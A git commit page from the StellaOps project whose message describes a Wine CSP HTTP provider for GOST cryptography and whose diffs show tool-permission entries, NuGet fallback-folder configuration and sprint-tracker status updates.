feat: Implement Wine CSP HTTP provider for GOST cryptographic operations
Some checks failed
AOC Guard CI / aoc-guard (push) Has been cancelled
AOC Guard CI / aoc-verify (push) Has been cancelled
Docs CI / lint-and-preview (push) Has been cancelled
Scanner Analyzers / Discover Analyzers (push) Has been cancelled
Scanner Analyzers / Build Analyzers (push) Has been cancelled
Scanner Analyzers / Test Language Analyzers (push) Has been cancelled
Scanner Analyzers / Validate Test Fixtures (push) Has been cancelled
Scanner Analyzers / Verify Deterministic Output (push) Has been cancelled
Signals CI & Image / signals-ci (push) Has been cancelled

- Added WineCspHttpProvider class to interface with Wine-hosted CryptoPro CSP.
- Implemented ICryptoProvider, ICryptoProviderDiagnostics, and IDisposable interfaces.
- Introduced WineCspHttpSigner and WineCspHttpHasher for signing and hashing operations.
- Created WineCspProviderOptions for configuration settings including service URL and key options.
- Developed CryptoProGostSigningService to handle GOST signing operations and key management.
- Implemented HTTP service for the Wine CSP with endpoints for signing, verification, and hashing.
- Added Swagger documentation for API endpoints.
- Included health checks and error handling for service availability.
- Established DTOs for request and response models in the service.
This commit is contained in:
StellaOps Bot
2025-12-07 14:02:42 +02:00
parent 965cbf9574
commit bd2529502e
56 changed files with 9438 additions and 699 deletions

View File

@@ -23,7 +23,9 @@
"Bash(test:*)", "Bash(test:*)",
"Bash(taskkill:*)", "Bash(taskkill:*)",
"Bash(timeout /t)", "Bash(timeout /t)",
"Bash(dotnet clean:*)" "Bash(dotnet clean:*)",
"Bash(if not exist \"E:\\dev\\git.stella-ops.org\\src\\Scanner\\__Tests\\StellaOps.Scanner.Analyzers.Lang.Java.Tests\\Internal\" mkdir \"E:\\dev\\git.stella-ops.org\\src\\Scanner\\__Tests\\StellaOps.Scanner.Analyzers.Lang.Java.Tests\\Internal\")",
"Bash(if not exist \"E:\\dev\\git.stella-ops.org\\src\\Scanner\\__Tests\\StellaOps.Scanner.Analyzers.Lang.Node.Tests\\Internal\" mkdir \"E:\\dev\\git.stella-ops.org\\src\\Scanner\\__Tests\\StellaOps.Scanner.Analyzers.Lang.Node.Tests\\Internal\")"
], ],
"deny": [], "deny": [],
"ask": [] "ask": []

View File

@@ -21,11 +21,11 @@
<RestoreWarningsAsErrors></RestoreWarningsAsErrors> <RestoreWarningsAsErrors></RestoreWarningsAsErrors>
<RestoreTreatWarningsAsErrors>false</RestoreTreatWarningsAsErrors> <RestoreTreatWarningsAsErrors>false</RestoreTreatWarningsAsErrors>
<RestoreDisableImplicitNuGetFallbackFolder>true</RestoreDisableImplicitNuGetFallbackFolder> <RestoreDisableImplicitNuGetFallbackFolder>true</RestoreDisableImplicitNuGetFallbackFolder>
<RestoreFallbackFolders></RestoreFallbackFolders> <RestoreFallbackFolders>clear</RestoreFallbackFolders>
<RestoreFallbackFoldersExcludes>clear</RestoreFallbackFoldersExcludes> <RestoreFallbackFoldersExcludes>clear</RestoreFallbackFoldersExcludes>
<RestoreAdditionalProjectFallbackFolders></RestoreAdditionalProjectFallbackFolders> <RestoreAdditionalProjectFallbackFolders>clear</RestoreAdditionalProjectFallbackFolders>
<RestoreAdditionalProjectFallbackFoldersExcludes>clear</RestoreAdditionalProjectFallbackFoldersExcludes> <RestoreAdditionalProjectFallbackFoldersExcludes>clear</RestoreAdditionalProjectFallbackFoldersExcludes>
<RestoreAdditionalFallbackFolders></RestoreAdditionalFallbackFolders> <RestoreAdditionalFallbackFolders>clear</RestoreAdditionalFallbackFolders>
<RestoreAdditionalFallbackFoldersExcludes>clear</RestoreAdditionalFallbackFoldersExcludes> <RestoreAdditionalFallbackFoldersExcludes>clear</RestoreAdditionalFallbackFoldersExcludes>
<DisableImplicitNuGetFallbackFolder>true</DisableImplicitNuGetFallbackFolder> <DisableImplicitNuGetFallbackFolder>true</DisableImplicitNuGetFallbackFolder>
</PropertyGroup> </PropertyGroup>

View File

@@ -1,7 +1,9 @@
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<configuration> <configuration>
<config> <config>
<add key="globalPackagesFolder" value="$(HOME)/.nuget/packages" /> <add key="globalPackagesFolder" value="./.nuget/packages" />
<add key="fallbackPackageFolders" value="" />
</config> </config>
<fallbackPackageFolders>
<clear />
</fallbackPackageFolders>
</configuration> </configuration>

View File

@@ -15,6 +15,7 @@
**External dependency tracker** **External dependency tracker**
| Dependency | Current state (2025-11-13) | Impact | | Dependency | Current state (2025-11-13) | Impact |
| --- | --- | --- | | --- | --- | --- |
| 2025-12-07 | Approved deploy asset paths under `ops/devops/findings-ledger/**`; LEDGER-29-009-DEV set to TODO. | Project Mgmt |
| Sprint 110.A AdvisoryAI | DONE | Enables Findings.I start; monitor regressions. | | Sprint 110.A AdvisoryAI | DONE | Enables Findings.I start; monitor regressions. |
| Observability metric schema | IN REVIEW | Blocks LEDGER-29-007/008 dashboards. | | Observability metric schema | IN REVIEW | Blocks LEDGER-29-007/008 dashboards. |
| Orchestrator job export contract | DONE (2025-12-03) | Contract documented in `docs/modules/orchestrator/job-export-contract.md`; usable for LEDGER-34-101 linkage. | | Orchestrator job export contract | DONE (2025-12-03) | Contract documented in `docs/modules/orchestrator/job-export-contract.md`; usable for LEDGER-34-101 linkage. |
@@ -55,7 +56,7 @@
| P3 | PREP-LEDGER-AIRGAP-56-001-MIRROR-BUNDLE-SCHEM | DONE (2025-11-22) | Due 2025-11-21 · Accountable: Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Mirror bundle provenance fields frozen in `docs/modules/findings-ledger/prep/2025-11-22-ledger-airgap-prep.md`; staleness/anchor rules defined. | | P3 | PREP-LEDGER-AIRGAP-56-001-MIRROR-BUNDLE-SCHEM | DONE (2025-11-22) | Due 2025-11-21 · Accountable: Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Mirror bundle provenance fields frozen in `docs/modules/findings-ledger/prep/2025-11-22-ledger-airgap-prep.md`; staleness/anchor rules defined. |
| 1 | LEDGER-29-007 | DONE (2025-11-17) | Observability metric schema sign-off; deps LEDGER-29-006 | Findings Ledger Guild, Observability Guild / `src/Findings/StellaOps.Findings.Ledger` | Instrument `ledger_write_latency`, `projection_lag_seconds`, `ledger_events_total`, structured logs, Merkle anchoring alerts, and publish dashboards. | | 1 | LEDGER-29-007 | DONE (2025-11-17) | Observability metric schema sign-off; deps LEDGER-29-006 | Findings Ledger Guild, Observability Guild / `src/Findings/StellaOps.Findings.Ledger` | Instrument `ledger_write_latency`, `projection_lag_seconds`, `ledger_events_total`, structured logs, Merkle anchoring alerts, and publish dashboards. |
| 2 | LEDGER-29-008 | DONE (2025-11-22) | PREP-LEDGER-29-008-AWAIT-OBSERVABILITY-SCHEMA | Findings Ledger Guild, QA Guild / `src/Findings/StellaOps.Findings.Ledger` | Develop unit/property/integration tests, replay/restore tooling, determinism harness, and load tests at 5M findings/tenant. | | 2 | LEDGER-29-008 | DONE (2025-11-22) | PREP-LEDGER-29-008-AWAIT-OBSERVABILITY-SCHEMA | Findings Ledger Guild, QA Guild / `src/Findings/StellaOps.Findings.Ledger` | Develop unit/property/integration tests, replay/restore tooling, determinism harness, and load tests at 5M findings/tenant. |
| 3 | LEDGER-29-009-DEV | BLOCKED | DEPLOY-LEDGER-29-009 (SPRINT_0501_0001_0001_ops_deployment_i) — waiting on DevOps to assign target paths for Helm/Compose/offline-kit assets; backup/restore runbook review pending | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Provide Helm/Compose manifests, backup/restore guidance, optional Merkle anchor externalization, and offline kit instructions (dev/staging artifacts). | | 3 | LEDGER-29-009-DEV | TODO | Asset paths approved under `ops/devops/findings-ledger/**`; implement Compose/Helm/offline-kit overlays and finalize backup/restore runbook. | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Provide Helm/Compose manifests, backup/restore guidance, optional Merkle anchor externalization, and offline kit instructions (dev/staging artifacts). |
| 4 | LEDGER-34-101 | DONE (2025-11-22) | PREP-LEDGER-34-101-ORCHESTRATOR-LEDGER-EXPORT | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Link orchestrator run ledger exports into Findings Ledger provenance chain, index by artifact hash, and expose audit queries. Contract reference: `docs/modules/orchestrator/job-export-contract.md`. | | 4 | LEDGER-34-101 | DONE (2025-11-22) | PREP-LEDGER-34-101-ORCHESTRATOR-LEDGER-EXPORT | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Link orchestrator run ledger exports into Findings Ledger provenance chain, index by artifact hash, and expose audit queries. Contract reference: `docs/modules/orchestrator/job-export-contract.md`. |
| 5 | LEDGER-AIRGAP-56-001 | DONE (2025-11-22) | PREP-LEDGER-AIRGAP-56-001-MIRROR-BUNDLE-SCHEM | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Record bundle provenance (`bundle_id`, `merkle_root`, `time_anchor`) on ledger events for advisories/VEX/policies imported via Mirror Bundles. | | 5 | LEDGER-AIRGAP-56-001 | DONE (2025-11-22) | PREP-LEDGER-AIRGAP-56-001-MIRROR-BUNDLE-SCHEM | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Record bundle provenance (`bundle_id`, `merkle_root`, `time_anchor`) on ledger events for advisories/VEX/policies imported via Mirror Bundles. |
| 6 | LEDGER-AIRGAP-56-002 | **DONE** (2025-12-06) | Implemented AirGapOptions, StalenessValidationService, staleness metrics. | Findings Ledger Guild, AirGap Time Guild / `src/Findings/StellaOps.Findings.Ledger` | Surface staleness metrics for findings and block risk-critical exports when stale beyond thresholds; provide remediation messaging. | | 6 | LEDGER-AIRGAP-56-002 | **DONE** (2025-12-06) | Implemented AirGapOptions, StalenessValidationService, staleness metrics. | Findings Ledger Guild, AirGap Time Guild / `src/Findings/StellaOps.Findings.Ledger` | Surface staleness metrics for findings and block risk-critical exports when stale beyond thresholds; provide remediation messaging. |
@@ -107,8 +108,8 @@
- Air-gap drift risk: mirror bundle format still moving; mitigation is to version the provenance schema and gate LEDGER-AIRGAP-* merges until docs/manifests updated. - Air-gap drift risk: mirror bundle format still moving; mitigation is to version the provenance schema and gate LEDGER-AIRGAP-* merges until docs/manifests updated.
- Cross-guild lag risk: Orchestrator/Attestor dependencies may delay provenance pointers; mitigation is weekly sync notes and feature flags so ledger work can land behind toggles. - Cross-guild lag risk: Orchestrator/Attestor dependencies may delay provenance pointers; mitigation is weekly sync notes and feature flags so ledger work can land behind toggles.
- Implementer contract now anchored in `src/Findings/AGENTS.md`; keep in sync with module docs and update sprint log when changed. - Implementer contract now anchored in `src/Findings/AGENTS.md`; keep in sync with module docs and update sprint log when changed.
- Remaining blocks: LEDGER-29-009 still waits on DevOps/offline review of backup/restore collateral; AIRGAP-56-002/57/58 and ATTEST-73 remain blocked on their upstream freshness/timeline/attestation specs. - Remaining blocks: AIRGAP-56-002/57/58 and ATTEST-73 remain blocked on upstream freshness/timeline/attestation specs; LEDGER-29-009 now proceeding with approved asset paths.
- Deployment asset path risk: Helm/Compose/offline kit overlays sit outside the module working directory; need DevOps-provided target directories before committing manifests (blocks LEDGER-29-009). - Deployment asset paths approved: use `ops/devops/findings-ledger/compose`, `ops/devops/findings-ledger/helm`, and `ops/devops/findings-ledger/offline-kit` for manifests and kits; update runbook accordingly.
- Backup collateral risk: until DevOps approves storage locations, backup/restore runbook lives only in `docs/modules/findings-ledger/deployment.md`; implementers must not commit manifests outside module paths. - Backup collateral risk: until DevOps approves storage locations, backup/restore runbook lives only in `docs/modules/findings-ledger/deployment.md`; implementers must not commit manifests outside module paths.
## Next Checkpoints ## Next Checkpoints

View File

@@ -24,7 +24,7 @@
| 1 | EXCITITOR-CONSOLE-23-001/002/003 | DONE (2025-11-23) | Dependent APIs live | Excititor Guild · Docs Guild | Console VEX endpoints (grouped statements, counts, search) with provenance + RBAC; metrics for policy explain. | | 1 | EXCITITOR-CONSOLE-23-001/002/003 | DONE (2025-11-23) | Dependent APIs live | Excititor Guild · Docs Guild | Console VEX endpoints (grouped statements, counts, search) with provenance + RBAC; metrics for policy explain. |
| 2 | EXCITITOR-CONN-SUSE-01-003 | **DONE** (2025-12-07) | Integrated ConnectorSignerMetadataEnricher in provenance | Connector Guild (SUSE) | Emit trust config (signer fingerprints, trust tier) in provenance; aggregation-only. | | 2 | EXCITITOR-CONN-SUSE-01-003 | **DONE** (2025-12-07) | Integrated ConnectorSignerMetadataEnricher in provenance | Connector Guild (SUSE) | Emit trust config (signer fingerprints, trust tier) in provenance; aggregation-only. |
| 3 | EXCITITOR-CONN-UBUNTU-01-003 | **DONE** (2025-12-07) | Verified enricher integration, fixed Logger reference | Connector Guild (Ubuntu) | Emit Ubuntu signing metadata in provenance; aggregation-only. | | 3 | EXCITITOR-CONN-UBUNTU-01-003 | **DONE** (2025-12-07) | Verified enricher integration, fixed Logger reference | Connector Guild (Ubuntu) | Emit Ubuntu signing metadata in provenance; aggregation-only. |
| 4 | EXCITITOR-CORE-AOC-19-002/003/004/013 | TODO | ATLN schema freeze | Excititor Core Guild | Deterministic advisory/PURL extraction, append-only linksets, remove consensus logic, seed Authority tenants in tests. | | 4 | EXCITITOR-CORE-AOC-19-002/003/004/013 | **DONE** (2025-12-07) | Implemented append-only linkset contracts and deprecated consensus | Excititor Core Guild | Deterministic advisory/PURL extraction, append-only linksets, remove consensus logic, seed Authority tenants in tests. |
| 5 | EXCITITOR-GRAPH-21-001..005 | TODO/BLOCKED | Link-Not-Merge schema + overlay contract | Excititor Core · Storage Mongo · UI Guild | Batched VEX fetches, overlay metadata, indexes/materialized views for graph inspector. | | 5 | EXCITITOR-GRAPH-21-001..005 | TODO/BLOCKED | Link-Not-Merge schema + overlay contract | Excititor Core · Storage Mongo · UI Guild | Batched VEX fetches, overlay metadata, indexes/materialized views for graph inspector. |
| 6 | EXCITITOR-OBS-52/53/54 | TODO/BLOCKED | Evidence Locker DSSE + provenance schema | Excititor Core · Evidence Locker · Provenance Guilds | Timeline events + Merkle locker payloads + DSSE attestations for evidence batches. | | 6 | EXCITITOR-OBS-52/53/54 | TODO/BLOCKED | Evidence Locker DSSE + provenance schema | Excititor Core · Evidence Locker · Provenance Guilds | Timeline events + Merkle locker payloads + DSSE attestations for evidence batches. |
| 7 | EXCITITOR-ORCH-32/33 | PARTIAL (2025-12-06) | Created orchestration integration files; blocked on missing Storage.Mongo project | Excititor Worker Guild | Adopt orchestrator worker SDK; honor pause/throttle/retry with deterministic checkpoints. | | 7 | EXCITITOR-ORCH-32/33 | PARTIAL (2025-12-06) | Created orchestration integration files; blocked on missing Storage.Mongo project | Excititor Worker Guild | Adopt orchestrator worker SDK; honor pause/throttle/retry with deterministic checkpoints. |
@@ -53,6 +53,7 @@
## Execution Log ## Execution Log
| Date (UTC) | Update | Owner | | Date (UTC) | Update | Owner |
| --- | --- | --- | | --- | --- | --- |
| 2025-12-07 | **EXCITITOR-CORE-AOC-19 DONE:** Implemented append-only linkset infrastructure: (1) Created `IAppendOnlyLinksetStore` interface with append-only semantics for observations and disagreements, plus mutation log for audit/replay (AOC-19-002); (2) Marked `VexConsensusResolver`, `VexConsensus`, `IVexConsensusPolicy`, `BaselineVexConsensusPolicy`, and related types as `[Obsolete]` with EXCITITOR001 diagnostic ID per AOC-19-003; (3) Created `AuthorityTenantSeeder` utility with test tenant fixtures (default, multi-tenant, airgap) and SQL generation for AOC-19-004; (4) Created `AppendOnlyLinksetExtractionService` replacing consensus-based extraction with deterministic append-only operations per AOC-19-013; (5) Added comprehensive unit tests for both new services with in-memory store implementation. | Implementer |
| 2025-12-07 | **EXCITITOR-CONN-SUSE-01-003 & EXCITITOR-CONN-UBUNTU-01-003 DONE:** Integrated `ConnectorSignerMetadataEnricher.Enrich()` into both connectors' `AddProvenanceMetadata()` methods. This adds external signer metadata (fingerprints, issuer tier, bundle info) from `STELLAOPS_CONNECTOR_SIGNER_METADATA_PATH` environment variable to VEX document provenance. Fixed Ubuntu connector's `_logger``Logger` reference bug. | Implementer | | 2025-12-07 | **EXCITITOR-CONN-SUSE-01-003 & EXCITITOR-CONN-UBUNTU-01-003 DONE:** Integrated `ConnectorSignerMetadataEnricher.Enrich()` into both connectors' `AddProvenanceMetadata()` methods. This adds external signer metadata (fingerprints, issuer tier, bundle info) from `STELLAOPS_CONNECTOR_SIGNER_METADATA_PATH` environment variable to VEX document provenance. Fixed Ubuntu connector's `_logger``Logger` reference bug. | Implementer |
| 2025-12-05 | Reconstituted sprint from `tasks-all.md`; prior redirect pointed to non-existent canonical. Added template and delivery tracker; tasks set per backlog. | Project Mgmt | | 2025-12-05 | Reconstituted sprint from `tasks-all.md`; prior redirect pointed to non-existent canonical. Added template and delivery tracker; tasks set per backlog. | Project Mgmt |
| 2025-11-23 | Console VEX endpoints (tasks 1) delivered. | Excititor Guild | | 2025-11-23 | Console VEX endpoints (tasks 1) delivered. | Excititor Guild |

View File

@@ -11,7 +11,7 @@
## Wave Coordination ## Wave Coordination
- **Wave A (SPL schema/tooling):** Tasks 1015 DONE; keep SPL schema/fixtures/canonicalizer/layering stable. - **Wave A (SPL schema/tooling):** Tasks 1015 DONE; keep SPL schema/fixtures/canonicalizer/layering stable.
- **Wave B (risk profile lifecycle APIs):** Tasks 12 DONE; publish schema and lifecycle endpoints; hold steady for downstream consumers. - **Wave B (risk profile lifecycle APIs):** Tasks 12 DONE; publish schema and lifecycle endpoints; hold steady for downstream consumers.
- **Wave C (risk simulations/overrides/exports/notifications/air-gap):** Tasks 37, 9 TODO; unblocked by contracts ([RISK-SCORING-002](../contracts/risk-scoring.md), [POLICY-STUDIO-007](../contracts/policy-studio.md), [AUTHORITY-EFFECTIVE-WRITE-008](../contracts/authority-effective-write.md), [MIRROR-BUNDLE-003](../contracts/mirror-bundle.md), [SEALED-MODE-004](../contracts/sealed-mode.md)). Task 8 remains BLOCKED on notifications contract. - **Wave C (risk simulations/overrides/exports/notifications/air-gap):** Tasks 37, 9 TODO; unblocked by contracts ([RISK-SCORING-002](../contracts/risk-scoring.md), [POLICY-STUDIO-007](../contracts/policy-studio.md), [AUTHORITY-EFFECTIVE-WRITE-008](../contracts/authority-effective-write.md), [MIRROR-BUNDLE-003](../contracts/mirror-bundle.md), [SEALED-MODE-004](../contracts/sealed-mode.md)). Task 8 (notifications) now unblocked; proceed with policy notifications implementation using `docs/modules/policy/notifications.md`.
- No additional work in progress; avoid starting Wave C until dependencies clear. - No additional work in progress; avoid starting Wave C until dependencies clear.
## Documentation Prerequisites ## Documentation Prerequisites
@@ -32,7 +32,7 @@
| 5 | POLICY-RISK-68-001 | DONE (2025-12-06) | Unblocked by [CONTRACT-AUTHORITY-EFFECTIVE-WRITE-008](../contracts/authority-effective-write.md). | Risk Profile Schema Guild · Authority Guild / `src/Policy/StellaOps.Policy.RiskProfile` | Scope selectors, precedence rules, Authority attachment. | | 5 | POLICY-RISK-68-001 | DONE (2025-12-06) | Unblocked by [CONTRACT-AUTHORITY-EFFECTIVE-WRITE-008](../contracts/authority-effective-write.md). | Risk Profile Schema Guild · Authority Guild / `src/Policy/StellaOps.Policy.RiskProfile` | Scope selectors, precedence rules, Authority attachment. |
| 6 | POLICY-RISK-68-002 | DONE (2025-12-06) | Unblocked by [CONTRACT-RISK-SCORING-002](../contracts/risk-scoring.md) (RiskOverrides included). | Risk Profile Schema Guild / `src/Policy/StellaOps.Policy.RiskProfile` | Override/adjustment support with audit metadata. | | 6 | POLICY-RISK-68-002 | DONE (2025-12-06) | Unblocked by [CONTRACT-RISK-SCORING-002](../contracts/risk-scoring.md) (RiskOverrides included). | Risk Profile Schema Guild / `src/Policy/StellaOps.Policy.RiskProfile` | Override/adjustment support with audit metadata. |
| 7 | POLICY-RISK-68-002 | DONE (2025-12-06) | Unblocked; can proceed after task 6 with [CONTRACT-EXPORT-BUNDLE-009](../contracts/export-bundle.md). | Policy · Export Guild / `src/Policy/__Libraries/StellaOps.Policy` | Export/import RiskProfiles with signatures. | | 7 | POLICY-RISK-68-002 | DONE (2025-12-06) | Unblocked; can proceed after task 6 with [CONTRACT-EXPORT-BUNDLE-009](../contracts/export-bundle.md). | Policy · Export Guild / `src/Policy/__Libraries/StellaOps.Policy` | Export/import RiskProfiles with signatures. |
| 8 | POLICY-RISK-69-001 | BLOCKED | Blocked by 68-002 and notifications contract (not yet published). | Policy · Notifications Guild / `src/Policy/StellaOps.Policy.Engine` | Notifications on profile lifecycle/threshold changes. | | 8 | POLICY-RISK-69-001 | TODO | Notifications contract published at `docs/modules/policy/notifications.md`. | Policy A<EFBFBD> Notifications Guild / `src/Policy/StellaOps.Policy.Engine` | Notifications on profile lifecycle/threshold changes. |
| 9 | POLICY-RISK-70-001 | DONE (2025-12-06) | Unblocked by [CONTRACT-MIRROR-BUNDLE-003](../contracts/mirror-bundle.md) and [CONTRACT-SEALED-MODE-004](../contracts/sealed-mode.md). | Policy · Export Guild / `src/Policy/StellaOps.Policy.Engine` | Air-gap export/import for profiles with signatures. | | 9 | POLICY-RISK-70-001 | DONE (2025-12-06) | Unblocked by [CONTRACT-MIRROR-BUNDLE-003](../contracts/mirror-bundle.md) and [CONTRACT-SEALED-MODE-004](../contracts/sealed-mode.md). | Policy · Export Guild / `src/Policy/StellaOps.Policy.Engine` | Air-gap export/import for profiles with signatures. |
| 10 | POLICY-SPL-23-001 | DONE (2025-11-25) | — | Policy · Language Infrastructure Guild / `src/Policy/__Libraries/StellaOps.Policy` | Define SPL v1 schema + fixtures. | | 10 | POLICY-SPL-23-001 | DONE (2025-11-25) | — | Policy · Language Infrastructure Guild / `src/Policy/__Libraries/StellaOps.Policy` | Define SPL v1 schema + fixtures. |
| 11 | POLICY-SPL-23-002 | DONE (2025-11-26) | SPL canonicalizer + digest delivered; proceed to layering engine. | Policy Guild / `src/Policy/__Libraries/StellaOps.Policy` | Canonicalizer + content hashing. | | 11 | POLICY-SPL-23-002 | DONE (2025-11-26) | SPL canonicalizer + digest delivered; proceed to layering engine. | Policy Guild / `src/Policy/__Libraries/StellaOps.Policy` | Canonicalizer + content hashing. |
@@ -44,6 +44,7 @@
## Execution Log ## Execution Log
| Date (UTC) | Update | Owner | | Date (UTC) | Update | Owner |
| --- | --- | --- | | --- | --- | --- |
| 2025-12-07 | Published notifications contract at `docs/modules/policy/notifications.md`; set POLICY-RISK-69-001 to TODO. | Project Mgmt |
| 2025-12-03 | Added Wave Coordination (A SPL tooling done; B risk lifecycle APIs done; C simulations/overrides/exports/notifications/air-gap blocked). No status changes. | Project Mgmt | | 2025-12-03 | Added Wave Coordination (A SPL tooling done; B risk lifecycle APIs done; C simulations/overrides/exports/notifications/air-gap blocked). No status changes. | Project Mgmt |
| 2025-11-27 | `POLICY-RISK-67-002` (task 2): Added `RiskProfileSchemaEndpoints.cs` with `/.well-known/risk-profile-schema` endpoint (anonymous, ETag/Cache-Control, schema v1) and `/api/risk/schema/validate` POST endpoint for profile validation. Extended `RiskProfileSchemaProvider` with GetSchemaText(), GetSchemaVersion(), and GetETag() methods. Added `risk-profile` CLI command group with `validate` (--input, --format, --output, --strict) and `schema` (--output) subcommands. Added RiskProfile project reference to CLI. | Implementer | | 2025-11-27 | `POLICY-RISK-67-002` (task 2): Added `RiskProfileSchemaEndpoints.cs` with `/.well-known/risk-profile-schema` endpoint (anonymous, ETag/Cache-Control, schema v1) and `/api/risk/schema/validate` POST endpoint for profile validation. Extended `RiskProfileSchemaProvider` with GetSchemaText(), GetSchemaVersion(), and GetETag() methods. Added `risk-profile` CLI command group with `validate` (--input, --format, --output, --strict) and `schema` (--output) subcommands. Added RiskProfile project reference to CLI. | Implementer |
| 2025-11-27 | `POLICY-RISK-67-002` (task 1): Created `Endpoints/RiskProfileEndpoints.cs` with REST APIs for profile lifecycle management: ListProfiles, GetProfile, ListVersions, GetVersion, CreateProfile (draft), ActivateProfile, DeprecateProfile, ArchiveProfile, GetProfileEvents, CompareProfiles, GetProfileHash. Uses `RiskProfileLifecycleService` for status transitions and `RiskProfileConfigurationService` for profile storage/hashing. Authorization via StellaOpsScopes (PolicyRead/PolicyEdit/PolicyActivate). Registered `RiskProfileLifecycleService` in DI and wired up `MapRiskProfiles()` in Program.cs. | Implementer | | 2025-11-27 | `POLICY-RISK-67-002` (task 1): Created `Endpoints/RiskProfileEndpoints.cs` with REST APIs for profile lifecycle management: ListProfiles, GetProfile, ListVersions, GetVersion, CreateProfile (draft), ActivateProfile, DeprecateProfile, ArchiveProfile, GetProfileEvents, CompareProfiles, GetProfileHash. Uses `RiskProfileLifecycleService` for status transitions and `RiskProfileConfigurationService` for profile storage/hashing. Authorization via StellaOpsScopes (PolicyRead/PolicyEdit/PolicyActivate). Registered `RiskProfileLifecycleService` in DI and wired up `MapRiskProfiles()` in Program.cs. | Implementer |
@@ -71,7 +72,7 @@
## Decisions & Risks ## Decisions & Risks
- Risk profile contracts now available at [CONTRACT-RISK-SCORING-002](../contracts/risk-scoring.md); SPL schema delivered (tasks 10-15 DONE). - Risk profile contracts now available at [CONTRACT-RISK-SCORING-002](../contracts/risk-scoring.md); SPL schema delivered (tasks 10-15 DONE).
- Policy Studio, Authority, and air-gap contracts now published; most Wave C tasks unblocked. - Policy Studio, Authority, and air-gap contracts now published; most Wave C tasks unblocked.
- Task 8 (POLICY-RISK-69-001) remains BLOCKED pending notifications contract. - Task 8 (POLICY-RISK-69-001) unblocked by notifications contract at `docs/modules/policy/notifications.md`; ready for implementation.
// Tests // Tests
- PolicyValidationCliTests: pass in graph-disabled slice; blocked in full repo due to static graph pulling unrelated modules. Mitigation: run in CI with DOTNET_DISABLE_BUILTIN_GRAPH=1 against policy-only solution via `scripts/tests/run-policy-cli-tests.sh` (Linux/macOS) or `scripts/tests/run-policy-cli-tests.ps1` (Windows). - PolicyValidationCliTests: pass in graph-disabled slice; blocked in full repo due to static graph pulling unrelated modules. Mitigation: run in CI with DOTNET_DISABLE_BUILTIN_GRAPH=1 against policy-only solution via `scripts/tests/run-policy-cli-tests.sh` (Linux/macOS) or `scripts/tests/run-policy-cli-tests.ps1` (Windows).

View File

@@ -10,7 +10,7 @@
## Wave Coordination ## Wave Coordination
- **Wave A (RiskEngine + Vuln API):** Tasks 1218 and 3537 DONE; keep schemas/fixtures stable. - **Wave A (RiskEngine + Vuln API):** Tasks 1218 and 3537 DONE; keep schemas/fixtures stable.
- **Wave B (Registry API):** Tasks 211 UNBLOCKED; OpenAPI spec available at `docs/schemas/policy-registry-api.openapi.yaml`. Run sequentially. - **Wave B (Registry API):** Tasks 211 UNBLOCKED; OpenAPI spec available at `docs/schemas/policy-registry-api.openapi.yaml`. Run sequentially.
- **Wave C (Policy tenancy):** Task 1 BLOCKED on platform RLS design; align with Registry once available. - **Wave C (Policy tenancy):** Task 1 TODO using RLS design at `docs/modules/policy/prep/tenant-rls.md`; align with Registry.
- **Wave D (VEX Lens):** Tasks 1934 DONE (2025-12-06); VEX Lens module complete. - **Wave D (VEX Lens):** Tasks 1934 DONE (2025-12-06); VEX Lens module complete.
- Wave B (Registry API) is now the active work queue. - Wave B (Registry API) is now the active work queue.
@@ -26,7 +26,7 @@
## Delivery Tracker ## Delivery Tracker
| # | Task ID & handle | State | Key dependency / next step | Owners | Task Definition | | # | Task ID & handle | State | Key dependency / next step | Owners | Task Definition |
| --- | --- | --- | --- | --- | --- | | --- | --- | --- | --- | --- | --- |
| 1 | POLICY-TEN-48-001 | BLOCKED | Tenant/project columns + RLS policy; needs platform-approved design. | Policy Guild / `src/Policy/StellaOps.Policy.Engine` | Tenant scoping + rationale IDs with tenant metadata. | | 1 | POLICY-TEN-48-001 | TODO | Tenant/project RLS design published at `docs/modules/policy/prep/tenant-rls.md`. | Policy Guild / `src/Policy/StellaOps.Policy.Engine` | Tenant scoping + rationale IDs with tenant metadata. |
| 2 | REGISTRY-API-27-001 | DONE (2025-12-06) | OpenAPI spec available; typed client implemented. | Policy Registry Guild / `src/Policy/StellaOps.Policy.Registry` | Define Registry API spec + typed clients. | | 2 | REGISTRY-API-27-001 | DONE (2025-12-06) | OpenAPI spec available; typed client implemented. | Policy Registry Guild / `src/Policy/StellaOps.Policy.Registry` | Define Registry API spec + typed clients. |
| 3 | REGISTRY-API-27-002 | DONE (2025-12-06) | Depends on 27-001; implemented. | Policy Registry Guild / `src/Policy/StellaOps.Policy.Registry` | Workspace storage with CRUD + history. | | 3 | REGISTRY-API-27-002 | DONE (2025-12-06) | Depends on 27-001; implemented. | Policy Registry Guild / `src/Policy/StellaOps.Policy.Registry` | Workspace storage with CRUD + history. |
| 4 | REGISTRY-API-27-003 | DONE (2025-12-06) | Depends on 27-002; implemented. | Policy Registry Guild / `src/Policy/StellaOps.Policy.Registry` | Compile endpoint integration. | | 4 | REGISTRY-API-27-003 | DONE (2025-12-06) | Depends on 27-002; implemented. | Policy Registry Guild / `src/Policy/StellaOps.Policy.Registry` | Compile endpoint integration. |
@@ -67,6 +67,7 @@
## Execution Log ## Execution Log
| Date (UTC) | Update | Owner | | Date (UTC) | Update | Owner |
| --- | --- | --- | | --- | --- | --- |
| 2025-12-07 | Published tenant/project RLS design at `docs/modules/policy/prep/tenant-rls.md`; set POLICY-TEN-48-001 to TODO. | Project Mgmt |
